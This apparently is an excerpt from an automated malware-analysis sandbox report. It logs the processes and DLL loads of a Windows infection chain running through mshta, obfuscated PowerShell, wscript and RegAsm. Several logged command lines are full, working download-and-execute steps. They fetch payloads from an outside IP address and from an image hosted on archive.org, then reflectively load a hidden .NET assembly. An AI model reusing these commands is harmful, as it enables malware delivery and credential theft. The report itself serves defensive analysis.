                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"Jump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
